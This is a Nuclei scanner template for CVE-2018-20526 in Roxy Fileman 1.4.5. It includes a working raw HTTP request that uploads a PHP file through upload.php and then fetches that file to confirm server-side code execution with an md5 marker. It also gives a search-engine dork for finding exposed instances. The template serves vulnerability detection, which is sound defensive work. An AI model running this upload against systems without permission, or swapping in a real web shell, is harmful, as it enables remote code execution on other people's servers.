76 lines
2.4 KiB
YAML
76 lines
2.4 KiB
YAML
id: CVE-2018-20526
|
|
|
|
info:
|
|
name: Roxy Fileman 1.4.5 - Unrestricted File Upload
|
|
author: DhiyaneshDK
|
|
severity: critical
|
|
description: |
|
|
Roxy Fileman 1.4.5 is susceptible to unrestricted file upload via upload.php. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
|
|
reference:
|
|
- http://packetstormsecurity.com/files/151033/Roxy-Fileman-1.4.5-File-Upload-Directory-Traversal.html
|
|
- https://www.exploit-db.com/exploits/46085/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-20526
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2018-20526
|
|
cwe-id: CWE-434
|
|
metadata:
|
|
max-request: 2
|
|
google-query: intitle:"Roxy file manager"
|
|
verified: true
|
|
tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /php/upload.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary20kgW2hEKYaeF5iP
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36
|
|
Origin: {{BaseURL}}
|
|
Referer: {{BaseURL}}
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
|
|
|
|
------WebKitFormBoundary20kgW2hEKYaeF5iP
|
|
Content-Disposition: form-data; name="action"
|
|
|
|
upload
|
|
------WebKitFormBoundary20kgW2hEKYaeF5iP
|
|
Content-Disposition: form-data; name="method"
|
|
|
|
ajax
|
|
------WebKitFormBoundary20kgW2hEKYaeF5iP
|
|
Content-Disposition: form-data; name="d"
|
|
|
|
/Uploads
|
|
------WebKitFormBoundary20kgW2hEKYaeF5iP
|
|
Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.php7"
|
|
Content-Type: application/octet-stream
|
|
|
|
<?php
|
|
echo md5('CVE-2018-20526');
|
|
?>
|
|
|
|
------WebKitFormBoundary20kgW2hEKYaeF5iP--
|
|
|
|
- |
|
|
GET /Uploads/{{randstr}}.php7 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
cookie-reuse: true
|
|
host-redirects: true
|
|
max-redirects: 2
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "f76d6a5f7491700cc3a678bdba2902d3"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|